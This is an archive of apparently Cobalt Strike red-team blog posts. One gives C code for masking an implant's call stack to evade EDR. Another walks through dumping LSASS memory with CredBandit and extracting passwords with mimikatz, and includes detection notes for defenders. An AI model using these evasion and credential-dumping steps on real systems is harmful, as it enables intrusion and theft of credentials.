Adversary Simulation Archives - Cobalt Strike Research and Development

Behind the Mask: Spoofing Call Stacks Dynamically with Timers

This blog introduces a PoC technique for spoofing call stacks using timers. Prior to our implant sleeping, we can queue up timers to overwrite its call stack with a fake one and then restore the original before resuming execution. Hence, in the same way we can mask memory belonging to our implant during sleep, we can also mask the call stack of our main thread. Furthermore, this approach avoids having to deal with the complexities of X64 stack unwinding, which is typical of other call stack spoofing approaches. 

The Call Stack Problem

The core memory evasion problem from an attacker’s perspective is that implants typically operate from injected code (ignoring any module hollowing approaches). Therefore, one of the pillars of modern detection is to monitor for the creation of threads which belong to unbacked (or ‘floating’) memory. This blog by Elastic is a good approximation to the state of the art in terms of anomalous thread detection from an EDR perspective. 

However, another implication of this problem for attackers is that all of the implant's API calls will also originate from unbacked memory. By examining call stacks, either at the time of a specific API invocation or by proactively inspecting running threads (e.g. ones which are sleeping), suspicious call stacks can be identified via return addresses to unbacked memory.

This is one detection area which historically has not received a huge amount of focus/research in modern EDR stacks (in my experience). However, this is starting to change with the release of open-source tools such as Hunt-Sleeping-Beacons, which will proactively inspect “sleeping” threads to find call stacks with unbacked regions. This demonstrably provides a high confidence signal of suspicious activity; hence it is valuable to EDRs and something attackers need to seriously consider in their evasion TTPs.  

Call Stack Inspection at Rest

The first problem to solve from an attacker’s perspective is how to manipulate the call stack of a sleeping thread so that it can bypass this type of inspection. This could be performed by the actual thread itself or via some external mechanism (APCs etc.).  

Typically, this is referred to as “spoofing at rest” (h/t to Kyle Avery here for this terminology in his excellent blog on avoiding memory scanners). The first public attempt to solve this problem is mgeeky’s ThreadStackSpoofer, which overwrites the last return address on the stack. 

As a note, the opposite way to approach this problem is by having no thread or call stack present at all, à la DeathSleep. The downside of this technique is the potential for the repeated creation of unbacked threads (depending on the exact implementation), which is a much greater evil in modern environments. However, future use of Hardware Stack Protection by EDR vendors may make this type of approach inevitable.

Call Stack Inspection During Execution – User Mode

The second problem is call stack inspection during execution, which could either be implemented in user mode or kernel mode. In terms of user mode implementation, this would typically involve hooking a commonly abused function and walking the stack to see where the call originated. If we find unbacked memory, it is highly likely to be suspicious. An obvious example of this is injected shellcode stagers calling WinInet functions. MalMemDetect is a good example of an open-source project that demonstrates this detection technique. 

For these scenarios, techniques such as RET address spoofing are normally sufficient to remove any evidence of unbacked addresses from the call stack. At a high level, this involves inserting a small assembly harness around the target function which will manually replace the last return address on the stack and redirect the target function to return to a trampoline gadget (e.g. jmp rbx). 

Additionally, there is SilentMoonWalk which uses a clever de-syncing approach (essentially a ROP gadget built on X64 stack unwinding codes). This can dynamically hide the origin of a function call and will similarly bypass these basic detection heuristics. Most importantly to an operator, both these techniques can be performed by the acting thread itself and do not require any external mechanism. 

From an opsec perspective, it is important to note that many of the techniques referenced in this blog may produce anomalous call stacks. Whether this is an issue or not depends on the target environment and the security controls in place. The key consideration is whether the call stack generated by an action is being recorded somewhere (say in the kernel, see next section) and appended to an event/alert. If this is the case, it may look suspicious to trained eyes (i.e. threat hunters/IR). 

To demonstrate this, we can take SilentMoonWalk's desync stack spoofing technique as an example (this is a slightly easier use case, as other techniques can be implementation specific). As stated previously, this technique needs to find functions which implement specific stack unwinding operations (a full overview of X64 stack unwinding is beyond the scope of this blog, but see this excellent CodeMachine article for further reading).

For example, the first frame must always perform a UWOP_SET_FPREG operation, the second UWOP_PUSH_NONVOL (rbp) etc. as demonstrated in windbg below:

0:000> knf
#   Memory  Child-SP          RetAddr               Call Site 
00           0000001d`240feb98 00007ffe`b622d831     win32u!NtUserWaitMessage+0x14 
[…] 
08        40 0000001d`240ff140 00007ffe`b483b576     KERNELBASE!CreatePrivateObjectSecurity+0x31 
09        40 0000001d`240ff180 00007ffe`b48215a5     KERNELBASE!Internal_EnumSystemLocales+0x406 
0a       3e0 0000001d`240ff560 00007ffe`b4870e22     KERNELBASE!SystemTimeToTzSpecificLocalTimeEx+0x25 
0b       680 0000001d`240ffbe0 00007ffe`b6d87614     KERNELBASE!PathReplaceGreedy+0x82 
0c       100 0000001d`240ffce0 00007ffe`b71826a1     KERNEL32!BaseThreadInitThunk+0x14 
0d        30 0000001d`240ffd10 00000000`00000000     ntdll!RtlUserThreadStart+0x21 

0:000> .fnent KERNELBASE!PathReplaceGreedy+0x82 
Debugger function entry 000001cb`dda19c60 for: 
(00007ffe`b4870da0)   KERNELBASE!PathReplaceGreedy+0x82   |  (00007ffe`b4871050)   KERNELBASE!SortFindString
[…]  
  06: offs 13, unwind op 3, op info 2	UWOP_SET_FPREG.

0:000> .fnent KERNELBASE!SystemTimeToTzSpecificLocalTimeEx+0x25 
Debugger function entry 000001cb`dda19c60 for:  
(00007ffe`b4821580)   KERNELBASE!SystemTimeToTzSpecificLocalTimeEx+0x25   |  (00007ffe`b482182c)   KERNELBASE!AddTimeZoneRules 
[…] 
08: offs b, unwind op 0, op info 5	UWOP_PUSH_NONVOL reg: rbp. 

This output shows the call stack for the spoofed SilentMoonwalk thread (knf) and the unwind operations (.fnent) for two of the functions found on the call stack (PathReplaceGreedy / SystemTimeToTzSpecificLocalTimeEx). 

The key takeaway is that this results in a call stack which would never occur for a legitimate code path (and is therefore anomalous): KERNELBASE!PathReplaceGreedy does not call KERNELBASE!SystemTimeToTzSpecificLocalTimeEx … and so on. Furthermore, an EDR could itself attempt to search for this pattern of unwind codes during a proactive scan of a sleeping thread. Again, whether this is an issue depends entirely on the controls/telemetry in place, but as operators it is always worth understanding the pros and cons of all the techniques at our disposal.
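For illustration, that kind of proactive scan can be approximated with the documented unwind APIs. In the sketch below, UNWIND_INFO and UNWIND_CODE are documented by Microsoft but not declared in the SDK headers, so minimal definitions are given by hand, and the iteration is simplified (it ignores multi-slot opcodes such as UWOP_ALLOC_LARGE). A scanner could apply this to each frame of a sleeping thread and flag the UWOP_SET_FPREG / UWOP_PUSH_NONVOL (rbp) pattern shown above:

#include <windows.h>

#define UWOP_PUSH_NONVOL 0
#define UWOP_SET_FPREG   3

// Documented layouts, declared by hand since the SDK headers omit them.
typedef struct _UNWIND_CODE {
    UCHAR CodeOffset;
    UCHAR UnwindOp : 4;
    UCHAR OpInfo   : 4;
} UNWIND_CODE;

typedef struct _UNWIND_INFO {
    UCHAR Version : 3;
    UCHAR Flags   : 5;
    UCHAR SizeOfProlog;
    UCHAR CountOfCodes;
    UCHAR FrameRegister : 4;
    UCHAR FrameOffset   : 4;
    UNWIND_CODE UnwindCode[1];
} UNWIND_INFO;

// Check whether the function owning ReturnAddress performs the given
// unwind operation (simplified: assumes one slot per opcode).
BOOL FrameUsesUnwindOp(PVOID ReturnAddress, UCHAR TargetOp)
{
    DWORD64 imageBase = 0;
    PRUNTIME_FUNCTION rf = RtlLookupFunctionEntry(
        (DWORD64)ReturnAddress, &imageBase, NULL);
    if (rf == NULL)
        return FALSE; // leaf function, no unwind info

    UNWIND_INFO *ui = (UNWIND_INFO *)(imageBase + rf->UnwindData);
    for (UCHAR i = 0; i < ui->CountOfCodes; i++)
    {
        if (ui->UnwindCode[i].UnwindOp == TargetOp)
            return TRUE;
    }
    return FALSE;
}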

Lastly, a trivial way of calling an API with a ‘clean’ call stack is to get something else to do it for you. The typical example is to use any callback type functionality provided by the OS (same applies for bypassing thread creation start address heuristics). The limitation for most callbacks is that you can normally only supply one argument (although there are some notable exceptions and good research showing ways around this). 

Call Stack Inspection During Execution – Kernel Mode

A user mode call stack can be captured inline during any of the kernel callback functions (i.e. process creation, thread creation/termination, handle access, etc.). As an example, the SysMon driver uses RtlWalkFrameChain to collect a user mode call stack for all process access events (i.e. calling OpenProcess to obtain a HANDLE). Hence, this capability makes it trivial to spot unbacked memory/injected code ('UNKNOWN') attempting to open a handle to LSASS. For example, in this contrived scenario you would get a call stack similar to the following:

0:020> knf 
#       Memory    Child-SP           RetAddr               Call Site 
00                0000004c`453cf428  00007ffd`7f1006fe     ntdll!NtOpenProcess 
01           8    0000004c`453cf430  00007ff6`98fe937f     KERNELBASE!OpenProcess+0x4e 
02          70    0000004c`453cf4a0  000002ad`c3fd1121     000002ad`c3fd1121 (UNKNOWN) 

Additionally, it is now possible to collect call stacks with the ETW threat intelligence provider. The call stack addresses are unresolved (i.e. an EDR would need to keep its own internal process module cache to resolve symbols), but they essentially give EDR vendors the ability to capture near real-time call stacks, where the symbols are then resolved asynchronously. Therefore, this can be seen as a direct replacement for user mode hooking which is, critically, captured in the kernel. It is not unrealistic to imagine a scenario in the future in which unbacked/direct API calls to sensitive functions (VirtualAlloc / QueueUserApc / SetThreadContext / VirtualProtect etc.) are trivial to detect.

These scenarios were the premise for some of my own previous research into call stack spoofing during execution: https://github.com/WithSecureLabs/CallStackSpoofer. The idea was to offload the API call to a new thread, which we could initialise to a fake state, to hide the fact that the call originated from unbacked memory. My original PoC applied this idea to OpenProcess, but it could easily be applied to image loads etc.

The key requirement here was that any arbitrary call stack could be spoofed, so that even if a threat hunter was reviewing an alert containing the call stack, it would still look indistinguishable from other threads. The downsides of this approach were the need to create a new thread, how best to handle this spoofed thread, and the reliance on a hard coded / static call stack.

Call Stack Masking

Having given a brief review of the current state of research into call stack spoofing, this blog will demonstrate a new call stack spoofing technique: call stack masking. The PoC introduced in this blog post solves the spoofing at rest problem by masking a sleeping thread's call stack via an external mechanism (timers).

While researching this topic in the past, I spent a large amount of time trying to get to grips with the complexities of X64 stack unwinding in order to produce TTPs to perform stack spoofing. This complexity is also present in a number of the other techniques discussed above. However, it occurred to me that there is a much simpler way to spoof/mask the call stack without having to deal with these intricacies. 

If we consider a generic thread that is performing any kind of wait, by definition, it cannot modify its own stack until the wait is satisfied. Furthermore, its stack is always read-writable. Therefore, we can use timers to:

  1. Create a backup of the current thread stack
  2. Overwrite it with a fake thread stack
  3. Restore the original thread stack just before resuming execution 

Any timer objects could be used, but for convenience I based my PoC on C5pider's Ekko sleep obfuscation technique.
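To sketch the idea in its simplest form, the snippet below uses plain timer-queue timers and a Sleep-based wait; the actual PoC builds on Ekko's approach and waits via WaitForSingleObject, and the structure, timings, and helper names here are illustrative only:

#include <windows.h>
#include <string.h>

// Illustrative sketch: queue three timer callbacks that run on a
// thread-pool thread while the main thread is frozen inside its wait,
// so they can safely rewrite the sleeping thread's stack.
typedef struct _MASK_CTX {
    PVOID  StackRegion;  // lowest address of the stack region to mask
    SIZE_T Size;         // bytes to back up / overwrite / restore
    PVOID  Backup;       // scratch buffer for the original stack
    PVOID  FakeStack;    // stack copied from a legitimate waiting thread
} MASK_CTX;

VOID CALLBACK BackupStack(PVOID param, BOOLEAN fired)
{
    MASK_CTX *ctx = (MASK_CTX *)param;
    memcpy(ctx->Backup, ctx->StackRegion, ctx->Size);      // 1. backup
}

VOID CALLBACK OverwriteStack(PVOID param, BOOLEAN fired)
{
    MASK_CTX *ctx = (MASK_CTX *)param;
    memcpy(ctx->StackRegion, ctx->FakeStack, ctx->Size);   // 2. mask
}

VOID CALLBACK RestoreStack(PVOID param, BOOLEAN fired)
{
    MASK_CTX *ctx = (MASK_CTX *)param;
    memcpy(ctx->StackRegion, ctx->Backup, ctx->Size);      // 3. restore
}

VOID MaskedSleep(MASK_CTX *ctx, DWORD ms)
{
    HANDLE t1, t2, t3;
    // NULL queue = default timer queue. The restore timer must fire just
    // before the wait returns; timer handle cleanup is omitted for brevity.
    CreateTimerQueueTimer(&t1, NULL, BackupStack,    ctx, 10,      0, WT_EXECUTEONLYONCE);
    CreateTimerQueueTimer(&t2, NULL, OverwriteStack, ctx, 20,      0, WT_EXECUTEONLYONCE);
    CreateTimerQueueTimer(&t3, NULL, RestoreStack,   ctx, ms - 10, 0, WT_EXECUTEONLYONCE);

    Sleep(ms);  // the stack is masked for nearly the entire wait
}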

The only remaining challenge is to work out the value of RSP once our target thread is sleeping. This can be achieved using compiler intrinsics (_AddressOfReturnAddress) to obtain the Child-SP of the current frame. Once we have this, we can subtract the total stack utilisation of the expected next two frames (i.e. KERNELBASE!WaitForSingleObjectEx and ntdll!NtWaitForSingleObject) to find the expected value of RSP at sleep time.
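A minimal sketch of that calculation is shown below; the two frame sizes are placeholders, to be measured with knf on the target Windows build:

#include <windows.h>
#include <intrin.h>

// Sketch: compute where RSP will be once this thread is parked inside
// ntdll!NtWaitForSingleObject. The frame sizes are assumptions for
// illustration; measure the real values with windbg's knf.
__declspec(noinline) ULONG_PTR ExpectedSleepRsp(VOID)
{
    // Child-SP of the current frame: the address holding this function's
    // return address, i.e. the value RSP had on entry.
    ULONG_PTR childSp = (ULONG_PTR)_AddressOfReturnAddress();

    const ULONG_PTR waitForSingleObjectExFrame = 0x48; // assumed
    const ULONG_PTR ntWaitForSingleObjectFrame = 0x28; // assumed

    // The stack grows downwards, so subtract the utilisation of the two
    // frames expected between here and the final syscall.
    return childSp - waitForSingleObjectExFrame - ntWaitForSingleObjectFrame;
}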

Lastly, to make our masked thread look as realistic as possible, we can copy the start address and call stack of an existing (and legitimate) thread.

PoC || GTFO

The PoC can be found here: https://github.com/Cobalt-Strike/CallStackMasker

The PoC operates in two modes: static and dynamic. The static mode contains a hard coded call stack that was found in spoolsv.exe via Process Explorer. This thread is shown below and can be seen to be in a state of ‘Wait:UserRequest’ via KERNELBASE!WaitForSingleObjectEx:

The screenshot below demonstrates static call stack masking. The start address and call stack of our masked thread are identical to the thread identified in spoolsv.exe above:

The obvious downside of the static mode is that we are still relying on a hard coded call stack. To solve this problem the PoC also implements dynamic call stack masking. In this mode, it will enumerate all the accessible threads on the host and find one in the desired target state (i.e. UserRequest via WaitForSingleObjectEx). Once a suitable thread stack is found, it will copy it and use that to mask the sleeping thread. Similarly, the PoC will once again copy the cloned thread’s start address to ensure our masked thread looks legitimate.
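In outline, the enumeration half of dynamic mode might look like the sketch below (helper names are mine; the wait-state and call stack checks the PoC performs are elided). It walks all threads with the Toolhelp API and recovers each thread's start address via the undocumented-but-well-known ThreadQuerySetWin32StartAddress information class:

#include <windows.h>
#include <tlhelp32.h>

typedef LONG NTSTATUS;
typedef NTSTATUS (NTAPI *NtQueryInformationThread_t)(
    HANDLE, ULONG, PVOID, ULONG, PULONG);

// Information class for a thread's Win32 start address (not in the SDK enum).
#define ThreadQuerySetWin32StartAddress 9

// Sketch of dynamic mode: enumerate accessible threads and recover each
// thread's start address. The real PoC additionally checks the candidate
// is waiting in KERNELBASE!WaitForSingleObjectEx, then copies both its
// start address and its stack to mask the implant's sleeping thread.
PVOID FindCandidateStartAddress(VOID)
{
    NtQueryInformationThread_t NtQueryInformationThread =
        (NtQueryInformationThread_t)GetProcAddress(
            GetModuleHandleA("ntdll.dll"), "NtQueryInformationThread");

    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
    if (snapshot == INVALID_HANDLE_VALUE) return NULL;

    THREADENTRY32 entry;
    entry.dwSize = sizeof(entry);
    PVOID startAddress = NULL;

    for (BOOL more = Thread32First(snapshot, &entry); more;
         more = Thread32Next(snapshot, &entry))
    {
        HANDLE thread = OpenThread(THREAD_QUERY_INFORMATION, FALSE,
                                   entry.th32ThreadID);
        if (thread == NULL) continue;

        PVOID candidate = NULL;
        if (NtQueryInformationThread(thread, ThreadQuerySetWin32StartAddress,
                &candidate, sizeof(candidate), NULL) == 0)
        {
            // ... here the PoC inspects the thread's wait reason and
            // call stack before electing to clone it ...
            startAddress = candidate;
        }
        CloseHandle(thread);
    }
    CloseHandle(snapshot);
    return startAddress;
}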

If we run the PoC with the '--dynamic' flag, it will locate another thread's call stack to mimic as shown below:

The target process (taskhostw.exe / 4520), thread (5452), and call stack identified above are shown below in Process Explorer:

If we now examine the call stack and start address of the main thread belonging to CallStackMasker, we can see it is identical to the mimicked thread:

Below is another example of CallStackMasker dynamically finding a shcore.dll based thread call stack from explorer.exe to spoof: 

The screenshot below shows the real ‘unmasked’ call stack:

Currently the PoC only supports WaitForSingleObject but it would be trivial to add in support for WaitForMultipleObjects.

As a final note, this PoC uses timer-queue timers, which I have previously demonstrated can be enumerated in memory: https://github.com/WithSecureLabs/TickTock. However, this PoC could be modified to use fully fledged kernel timers to avoid this potential detection opportunity. 

CredBandit (In memory BOF MiniDump) – Tool review – Part 1

One of the things I find fascinating about being on the Cobalt Strike team is the community. It is amazing to see how people overcome unique challenges and push the tool in directions never considered. I want to explore this with CredBandit (https://github.com/xforcered/CredBandit). This tool has had updates since I started exploring it. I'm specifically looking at this version for this blog post.

In part 2, I'll explore the latest version and how it uses an "undocumented" feature to solve the challenges discussed in this post.

Per the author:

CredBandit is a proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel. The memory dump is done by using NTFS transactions, which allows us to write the dump to memory. Additionally, the MiniDumpWriteDump API has been replaced with an adaptation of ReactOS’s implementation of MiniDumpWriteDump.
When you dig into this tool, you will see that CredBandit is "just another minidump tool." This is true, but there are some interesting approaches to it.
My interest in CredBandit is less about the minidump implementation and more about the "duct tape engineering" used to bend Beacon to anthemtotheego's will.

CredBandit uses an unconventional way of transferring in-memory data through Beacon by overloading the BEACON_OUTPUT aggressor function to handle data sent from the BeaconPrintf() function.

There are other interesting aspects to this project, namely:

    • Beacon Object File (BOF) using direct syscalls
    • In memory storage of data (The dump does not need to be written to disk)
    • ReactOS implementation of MiniDumpWriteDump
You can read more about the minidump technique here (T1003-001) or here (Dump credentials from lsass without mimikatz).

Note on the Defense Perspective

Although the focus of this post is to highlight an interesting way to bend Cobalt Strike to a user's will, it does cover a credential dumping technique. Understanding detection opportunities of techniques vs. tools is an important concept in security operations. It can be helpful to highlight both the offense capabilities and defense opportunities of a technique. I've invited Jonny Johnson (https://twitter.com/jsecurity101) to add context to the detection story of this technique, seen below in the Detection Opportunities section.

Quick Start

Warning: BOFs run in Beacon’s memory. If they crash, Beacon crashes. The stability of this BOF may not be 100% reliable. Beacons may die. It’s something to consider if you choose to use this or any other BOF.

CredBandit is easy to use, but don't let that fool you into thinking it isn't a clever approach to creating a minidump. All the hard work has been done, and you only need a few commands to use it.

The basic process is as follows:

  1. Clone the project: https://github.com/xforcered/CredBandit
  2. Compile CredBandit to a BOF
  3. Load the aggressor script in Cobalt Strike
  4. Launch a beacon running in context with the necessary permissions (i.e., high integrity process running as administrator)
  5. Locate the PID of LSASS
  6. Run CredBandit
  7. Wait …. 🙂
  8. Convert the CredBandit output into a usable dump
  9. Use Mimikatz to extract information from the dump

Consult the readme for details.

Let’s See This in Action

Load the aggressor script from the Cobalt Strike manager

Get the PID of LSASS

Interact with a beacon running with the permissions needed to dump LSASS memory and get the PID of LSASS.

The output of ps gives us a PID of 656.

Run CredBandit to capture the minidump of LSASS

Loading the MiniDumpWriteDump.cna aggressor script added the command credBandit to Beacon.

Running help shows we only need the PID of LSASS to use the command credBandit.

This will take time. Beacon may appear to be unresponsive, but it is processing the minidump and sending back chunks of data by hijacking the BeaconPrintf function. In this example, over 80 MB of data must be transferred.

Once the dump is complete, Beacon should return to normal. A word of caution: I had a few Beacons die after the process completed. The data was successfully transferred, but the Beacon process died. This could be due to the BOF being functional but missing error handling, but I did not investigate.

NOTE: The CredBandit aggressor script, MiniDumpWriteDump.cna, changed the behavior of BEACON_OUTPUT. This can cause other functions to fail. You should unload the script and restart the Cobalt Strike client or use RevertMiniDumpWriteDump.cna to reverse the changes.

Convert the extracted data to a usable format

The file dumpFile.txt is created in the cobaltstrike directory. This file is generated by "hijacking" the BEACON_OUTPUT function to write the chunks of data received from the BeaconPrintf function.

Run the cleanupMiniDump.sh command to convert this file back into something useful:

./cleanupMiniDump.sh

You will now have two new files in the cobaltstrike directory: .dmp and .txt.

The .txt is a backup of the original dumpFile.txt.

The .dmp is the minidump file of LSASS.

Use Mimikatz to extract information from the dump

At this point, we are done with CredBandit. It provided the dump of LSASS. We can now use Mimikatz offline to extract information.

You can use something like the following commands:

mimikatz
mimikatz # sekurlsa::minidump c:\payloads\credBandit\lsass.dmp
mimikatz # sekurlsa::logonPasswords



BTW, dontstealmypassword


Demo

Here is a quick demo of the tool.


Breaking down the key concepts

Beacon Object File (BOF) using direct syscalls

Direct syscalls can provide a way of evading API hooking by security tools, since the hooked user-mode APIs never need to be called.

CredBandit uses much of the work done by Outflank on using syscalls in Beacon Object Files. I won't spend time on this, but there are great resources available.

In memory storage of data

The minidump output is stored in Beacon’s memory vs. being written to disk. This is based on using a minidump implementation that uses NTFS transactions to write to memory: https://github.com/PorLaCola25/TransactedSharpMiniDump

ReactOS implementation of MiniDumpWriteDump

MiniDumpWriteDump API is replaced with an adaptation of ReactOS’s implementation of MiniDumpWriteDump: https://github.com/rookuu/BOFs/tree/main/MiniDumpWriteDump

Unconventional way of transferring in memory data through Beacon via overloaded BeaconPrintf() function

This is what I find most interesting about this project. In short, the BEACON_OUTPUT aggressor function is used to capture the base64-encoded dump it receives as chunks from BeaconPrintf. These chunks are written to a file that can be cleaned up and decoded.

How does this hack work? It’s clever and simple. The BOF uses the BeaconPrintf function to send chunks of the base64 encoded minidump file to the teamserver. This data is captured and written to a file on disk.
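On the BOF side, the sending half of this hack can be pictured as nothing more than a loop over the encoded dump. A hedged sketch, assuming a base64 buffer has already been produced (the helper name and chunk size are illustrative; beacon.h is the standard BOF header):

#include "beacon.h"

// Sketch of the sending side: stream the base64-encoded minidump back
// over the existing C2 channel as a series of BeaconPrintf outputs. The
// overloaded BEACON_OUTPUT aggressor function reassembles the chunks.
#define CHUNK_SIZE 8192

void SendDump(char *base64Dump, int length)
{
    for (int offset = 0; offset < length; offset += CHUNK_SIZE)
    {
        int remaining = length - offset;
        int n = remaining < CHUNK_SIZE ? remaining : CHUNK_SIZE;

        // Each call shows up server-side as one "received output" event.
        BeaconPrintf(CALLBACK_OUTPUT, "%.*s", n, base64Dump + offset);
    }
}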

The following is an example of the output file:

received output:
TURNUJOnAAAEAAAAIAAAAAAAAAAAAAAAIggAAAAAAAAHAAAAOAAAAFAAAAAEAAAAdCMAAIwAAAAJAAAAUCQAAMI6AAAAAAAAAAAAAAAAAAA...
received output:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABolPx/AAAA4AkACJUKAP2mu1yUJQAAvQTv/gAAAQAAAAcAAQDuQgAACgABAO5CPwAAAAA...
received output:
AAAAAAAAAAAAAAAAAAAAAAAAAAC5kPx/AAAAoA4A94kOABHEhU5sJwAAvQTv/gAAAQACAAYAAQDuQgAACgABAO5CPwAAAAAAAAAEAAQAAgA...
received output:
AAAAAAAAAAAAAAAYkfx/AAAAoAcADk4IABy/Gt86KQAAvQTv/gAAAQACAAYAAQDuQgAACgABAO5CPwAAAAAAAAAEAAQAAgAAAAAAAAAAAAA...

This minidump file is rebuilt using the script cleanupMiniDump.sh. Credential material can be extracted using Mimikatz.


Adjusting the Technique

The heart of this technique is based on accessing and dumping LSASS. Instead of using the suspicious activity of payload.exe accessing lsass.exe, you could find a process that regularly accesses LSASS, inject into that process, and perform your dump.

The FindObjects-BOF project (https://github.com/outflanknl/FindObjects-BOF) may help you locate a process that has a handle to lsass.exe using similar OPSEC to CredBandit, as it also uses a BOF and direct system calls. FindObjects-BOF is "A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific modules or process handles."

Give it a try!


Detection Opportunities

Although the focus of this post was to highlight an interesting way to bend Cobalt Strike to a user's will, it does cover a credential dumping technique. Understanding detection opportunities of techniques vs. tools is an important concept in detection engineering. I've invited Jonny Johnson (https://twitter.com/jsecurity101) to provide context to the detection story of this technique.

Jonny's detection notes are in the left column, and I have added my take in the right.

Detection Story by Jonny | Joe's comments
Before we can start creating our detection, we must identify the main action of this whole chain: opening a handle to LSASS. That will be the core of this detection. If we detect on the tool or code specifically, then we lose detection visibility once someone writes new code that uses different functions. By focusing on the technique's core behavior, we avoid manually creating a gap in our detection strategy. For this piece I am going to leverage Sysmon Event ID 10 – Process Accessed. This event allows me to see the source process that requested access to the target process, the target process, the granted access rights (explained in a moment), along with both the source process GUID and target process GUID.

Sysmon Event ID 10 fires when OpenProcess is called, and because Sysmon is a kernel driver, it has insight into OpenProcess in both user mode and kernel mode. This particular implementation uses a syscall for NtOpenProcess within ntdll.dll, which is the Native API version of the Win32 API OpenProcess.

How is this useful?

Within the NtOpenProcess documentation, there is a parameter called DesiredAccess. This correlates to the ACCESS_MASK type, which is a bitmask. This access is typically defined by the function that wants to obtain a handle to a process. OpenProcess acts as a middleman between the function call and the target process. The function in this instance is MiniDumpWriteDump. Although ReactOS's implementation of MiniDumpWriteDump is being used, we are still dealing with Windows securable objects (e.g. processes and files). Due to this, we must follow Windows' built-in rules for these objects. Also, ReactOS's MiniDumpWriteDump uses the exact same parameters as Microsoft's MiniDumpWriteDump API.

Don't overemphasize tools. Fundamentally, this technique is based on detecting a process accessing LSASS.

"ReactOS's MiniDumpWriteDump is using the exact same parameters as Microsoft's MiniDumpWriteDump API." It is important to focus on the technique's primitives. There can be multiple implementations by different tools, but the technique can often be broken down into primitives.

Within Microsoft's documentation, we can see that if MiniDumpWriteDump wants to obtain a handle to a process, it must have PROCESS_QUERY_INFORMATION & PROCESS_VM_READ access to that process, which we can see is requested in the CredBandit source code below:

However, this still isn't the minimum set of rights that a process needs to perform this action on another process. After reading Microsoft's Process Security and Access Rights, we can see that anytime a process is granted PROCESS_QUERY_INFORMATION, it is automatically granted PROCESS_QUERY_LIMITED_INFORMATION. The combination has a hex value of 0x1410 (this will be used in the analytic later).
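To make the 0x1410 value concrete, the handle request that Sysmon observes boils down to a call like the following (hypothetical helper; the access flags mirror the CredBandit source referenced above):

#include <windows.h>

// The access MiniDumpWriteDump requires on its target process. Requesting
// PROCESS_QUERY_INFORMATION (0x0400) causes the kernel to also grant
// PROCESS_QUERY_LIMITED_INFORMATION (0x1000), so together with
// PROCESS_VM_READ (0x0010) the GrantedAccess logged by Sysmon Event ID 10
// is 0x1410.
HANDLE OpenLsassForDump(DWORD lsassPid)
{
    return OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,
                       FALSE, lsassPid);
}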

Next, we want to see the file created via NtCreateTransacted. Sysmon uses a minifilter driver to monitor the file system stack indirectly, so it has insight into files being written to disk or a phantom file. One thing we have to be careful with is that we don't know the extension the actor might use for the dump file. Bottom line: this is attacker-controlled, and if we hardcode it into our analytic we risk creating a blind spot, which can lead to an analytical bypass.

Lastly, a little icing on the cake would be to add a process creation event to this analytic as it would just provide context around which user was leveraged for this activity.

Data Sources/Events:

User Rights:

Process Access:

File Creation:

  • Sysmon Event ID 11

Process Creation:

A detection strategy hypothesis should account for potential blind spots. Blind spots are not bad, but should be identified. https://posts.specterops.io/detection-in-depth-a2392b3a7e94

Analytics:

The following analytics are not meant to be copied and pasted; they are more of a starting point for detection in your environment. If you only look for the access rights 0x1410, then you will create a blind spot if an actor uses ReadProcessMemory to dump LSASS. Ideally, multiple detections would be made for dumping LSASS so that blind spots could be covered along the way.

Sysmon EID 10 Process Access

Regarding Detection:

Multiple combinations of access rights may be requested based on the implementation. Focus on a query to cover minimal rights needed. This will reduce blind spots based on a specific implementation.

Regarding OPSEC:

Notice that payload.exe is accessing lsass.exe. This is due to this implementation being a BOF that runs directly in the context of Beacon.

BOF and syscalls can be great, but maintain OPSEC awareness.

Sysmon EID 10 & EID 11

Sysmon EID 10, 11, & 1

Detection Summary

When writing a detection the first thing I do is identify the capabilities that a tool and/or technique has. This helps me narrow in on a scope. A piece of code could be implementing 3-4 techniques. When this happens, I separate these techniques and look into them separately. This allows me to create a detection strategy per capability.
When the capability is identified and the components being used are highlighted, proper scoping can be applied. We can see a commonality between this implementation and many others. That commonality is MiniDumpWriteDump and the access rights needed for that function call. This is the foundation of our detection, or base condition. However, this could be evaded if an actor uses ReadProcessMemory, because a different set of minimum access rights is needed. A separate detection would need to be created for this function. This is ideal, as it overlaps our detections to cover the blind spots related to a technique.
Pulling attributes like file creation and process creation are contextual attributes that can be applied back to the core detection (MiniDump). The detection shouldn’t rely on these attributes because they are not guaranteed to be present.

Cobalt Strike is not inherently malicious. It is simply a way for someone to implement an action. The intent behind that action is what determines a classification of malicious or benign. Consequently, I don’t focus on Cobalt Strike specific signatures, I look at the behavior/technique being implemented.

I like how Palantir outlines a method for documenting detection strategies using their Alerting and Detection Strategy Framework (ADS).
Jonny Johnson (https://twitter.com/jsecurity101)

Thanks to https://twitter.com/anthemtotheego for creating this tool.

Stay tuned for part 2 where I'll talk about how the latest version uses an "undocumented" feature to download the minidump file instead of hijacking the BEACON_OUTPUT function.

Conclusion

Wait?!?! This post highlighted the need to 'hack' Cobalt Strike because of a lack of features. Why isn't this part of the toolset?

Cobalt Strike is a framework. It is meant to be tuned to fit a user’s need. Projects like this help expose areas that can be improved. This helps the team add new features, update documentation, or provide examples.


The Threat Emulation Problem

There are a lot of people who talk about threat emulation. Use our super-duper-elitesy-neatsy-malware to emulate these tactics in your network. I say stuff like that too. It’s cool. In this post, I’d like to write about what threat emulation means to me, really.

I see red teams as offensive operators capable of executing attacks as an advanced representative actor. By representative actor, I mean one that may have similar sophistication to what their customer faces day-to-day, but the actions of the red team are solely theirs. The red team has their own tradecraft, their own process, and their own way of doing things. They're not really emulating anyone else [although, like all good offensive actors, they're happy to blatantly borrow what works from others].

What is the value of these red team operations? I covered this topic in Models for Red Team Operations. I see red teams provide a lot of value when they work to exercise a security process in a comprehensive way.

So far, we’ve established: a red team is a representative actor. Fine. What’s a threat emulator then? A threat emulator is an offensive operator who emulates a specific threat in a network. What is the value of a specific threat over a representative threat? Analysis. As a representative actor, there’s little room to exercise and evaluate a training audience’s ability to analyze the incident, tie it to threat intelligence, and possibly cross-share it with others. If a team emulates a specific actor, ideally, there’s a wealth of information for incident response teams to draw on to better inform their actions and drive their process.

If threat emulation is emulating a specific threat AND the purpose behind this is to exercise analysis, then what is the threat emulation problem?

